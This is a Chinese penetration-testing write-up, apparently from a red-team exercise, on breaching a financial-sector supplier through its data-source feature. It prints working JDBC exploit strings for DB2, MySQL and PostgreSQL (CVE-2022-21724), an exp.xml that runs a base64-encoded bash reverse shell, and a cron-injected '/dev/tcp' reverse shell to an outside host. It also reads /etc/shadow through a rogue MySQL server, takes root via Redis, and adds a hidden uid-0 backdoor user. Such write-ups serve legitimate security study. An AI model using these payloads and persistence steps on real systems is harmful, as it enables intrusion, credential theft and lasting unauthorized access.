前言背景

最近 HW 要开始了，准备对金融行业的一次供应商下手，从供应商角度进行渗透难度门槛确实要低很多了，本文就是其中一个供应商渗透的一个经典素材，本文均做打码处理，发出来仅做思路学习分享，共勉！

拿下数据

拿到系统的 Web 界面的时候，先别想着直接系统后台 getshell，先把系统整体过一遍， 我们这里运气就比较好，直接翻到了系统里面的测试的 MySQL 敏感信息了：

开门红呀，这次渗透运气居然这么好？！

连接数据

连接很顺利啊，上面翻到的数据库密码居然真的可以连接：

但是好像敏感数据不是很多，emmmm

算了算了，就知道渗透不会这么顺利简单的，我们还是得想办法好好深入渗透一下。

Druid Monitor

Druid Monitor 是 Java 网站下常用的数据库连接池，很多开发者习惯性的直接暴露在公网上，我们经常可以未授权直接访问或者弱口令爆破一下，幸运的是，本网站的 Druid Monitor 也被我们成功拿下，发现这个 Java 站点用了几个数据库相关的驱动 Jar 包：

主要和数据库相关的 JDBC 驱动信息相关内容整理如下：

• com.mysql.cj.jdbc.Driver：/root/deploy/lib/mysql-connector-j-8.3.0.jar
• org.postgresql.Driver：/root/deploy/lib/postgresql-42.4.5.jar
• oracle.jdbc.OracleDriver ：

所以真正可以跑起来的也就这 3 个数据库，网站支持数据源接入，界面如下：

可以看到这就是虚假宣传呀，前端写了支持这么多数据库接入，但是还好我们通过 Druid Monitor  瞅了一眼 JDBC 相关的驱动，否则可能会走不少弯路。

JDBC 攻击面

其实如果我们可以操控数据源的话，就相当于间接的操作了  JDBC 的字符连接串，相关的漏洞很多，从 IBM 的 DB2 数据库，到 PostgreSQL 以及常见的 MySQL 历史上都出现一些重大的 RCE 级别的 CVE 漏洞的，我们多关注这些 CVE  漏洞必要时还是很有用的。

常见的 JDBC RCE 漏洞国光我简单列举几个吧：

IBM DB2 JDBC  RCE 姿势

BLUDB:clientRerouteServerListJNDIName=ldap://{IP};
jdbc:db2://x.x.x.x:3306/BLUDB:clientRerouteServerListJNDIName=ldap://x.x.x.x:1389/Deserialization/CommonsCollectionsK1/Command/Base64/xxxxxxx=;

MySQL JDBC  RCE 姿势

在版本 >= 8.0.20, >= 5.1.49 中, 此漏洞已经被修复 https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a865998f64ee5b35b1b https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f798d506f2

网上一键利用的项目挺多，比如国光常用的有：rmb122/rogue_mysql_server

MySQL JDBC 文件读取姿势

?allowLoadLocalInfile=true&allowUrlInLocalInfile=true

依然可以使用 rmb122/rogue_mysql_server  项目来进行文件读取利用

PostgreSQL CVE-2022-21724 RCE

test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://1.1.1.1/exp.xml

exp.xml 内容如下：

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean class="java.lang.String">
<property name="whatever" value="#{T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFxxxxxxxxxxxxxxxxxxxxxxxxxgMD4mMQ==}|{base64,-d}|{bash,-i}')}"/>
</bean>
</beans>

PostgreSQL CVE-2022-21724 文件写入

jdbc:postgresql:///?loggerLevel={loggerLevel}&loggerFile={loggerFile}&shellContent

利用案例细节：

"dbName": "21u000a*/1 * * * * bash -i >& /dev/tcp/1.1.1.1/4444 0>&1u000a?loggerLevel=DEBUG&loggerFile=../../../../../../../../../../../../../../../../var/spool/cron/root&",
        "driverName": "org.postgresql.Driver",

文件读取

很不幸，我们这个网站使用的是 mysql-connector-j-8.3.0.jar 和 postgresql-42.4.5.jar 高版本，敲好我们上面准备的 RCE 利用姿势没法直接使用：

但是好在存在 MySQL JDBC 文件读取姿势可以利用，我们通过 Web 界面构造好 JDBC 连接串，一般我们通常在 DB 数据库名后面配置拼接，比如这里我们填写的数据库名为：

test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true#

然后在数据源里面填好我们通过 rmb122/rogue_mysql_server  项目启动的假的 MySQL 的服务器信息：

尝试读取 /etc/shadow 居然都成功的，看来权限很高呀：

既然是高权限的文件读取，我们可读的文件就灵活很多了：

翻阅文件

在只有文件读取权限的情况下，不知道敏感文件的具体路径，这个时候就有点盲人摸象的感觉，全靠运气和细致的信息收集了：

/root/ .bash_history

翻一下 root 用户敲的命令是一个很常见实用的思路，我们来康康到底有啥，我们定位到了一个 yml 的配置文件和另一个 139 开头的服务器信息：

可惜通过文件读取 SSH 相关的敏感信息，该服务器并不是通过公私钥来进行 SSH 远程控制 139 服务器的，所以我们没法直接去接管 139 服务器，只能想办法看看这个 application-dev.yml 的文件内容了。

root/deploy/deploy.sh

通过 .bash_history 历史命令记录：

提取关键信息如下：

cd
ls
cd deploy
ls
ll
./deploy.sh es dev

所以可以反推出 deploy.sh 的绝对路径信息为：

/root/deploy/deploy.sh

脚本审计

通过读取 /root/deploy/deploy.sh 的内容，我们需要来确定好 yml 配置文件的路径：

提取关键信息如下：

#判断参数个数
if [ $# != 2 ]; then
 echo "参数个数不正确 请输入 1.项目(es,ts) 2.环境(dev,sit,uat,prd)"
 exit 1
fi

# 定义变量
basePath=~/deploy
mainClass=App
# 获取参数
app=$1
env=$2

# 判断参数是否正确
if [ "$app" != "es" ] && [ "$app" != "ts" ]; then
    echo "请输入正确的参数：es 或 ts"
    exit 1
fi

if [ "$env" != "dev" ] && [ "$env" != "sit" ] && [ "$env" != "uat" ] && [ "$env" != "prd" ]; then
    echo "请输入正确的参数：sit 或 uat 或 prd"
    exit 1
fi

# 启动
echo "启动"
cd $basePath/$app/
nohup java -Xms1024m -Xmx4096m -Dlogback.configurationFile=$basePath/$app/logback.xml -classpath  "$basePath/lib/*:$basePath/$app/df-$app.jar" com.skyon.$mainClass --spring.config.location=$basePath/$app/application-$env.yml 2>&1 &

所以可以推测出 application 相关的配置文件有以下几个可能：

• /root/deploy/es/application-dev.yml
• /root/deploy/es/application-sit.yml
• /root/deploy/es/application-uat.yml
• /root/deploy/es/application-prd.yml
• /root/deploy/ts/application-dev.yml
• /root/deploy/ts/application-sit.yml
• /root/deploy/ts/application-uat.yml
• /root/deploy/ts/application-prd.yml

关键配置

上面有 8 种可能，期间读取失败了很多次，都是一些没敏感信息的配置文件：

这些无效信息并不能让我们继续深入下去，继续赌一把，继续读取看看，毕竟还有几个可能的路径没有尝试呢？

终于，这次赌对了，居然真的在一个 dev  配置文件里面读取了 139 服务器的  Redis 的密码，这个密码虽然被注释了，但是还是被我们发现了：

我们来连接看看，居然真的连接成功了：

运气开始好起来了：

Redis RCE

虽然 Redis 里面的超级管理员的密码是加密的：

但好在 Redis 是 5.0.3 低版本：

所以利用

https://github.com/Dliv3/redis-rogue-server

项目：

直接加载 exp.so 来命令执行，成功拿到 139 服务器的 root 权限：

权限维持

这个 Redis CLI 交互不是很方便，第一步直接反弹 tty shell 到外网服务器：

添加一个 ibm2 密码为 P@ssw0rd 的 root 权限用户：

useradd -p `openssl passwd -1 -salt 'salt' P@ssw0rd` ibm2 -o -u 0 -g root -G root -s /bin/bash -d /home/guest

成功登录，进入内网：

新的内网渗透即将开始了，「新的风暴已经出现，怎么能够停滞不前。」好了，本文篇幅有限，接下来就不继续展开了：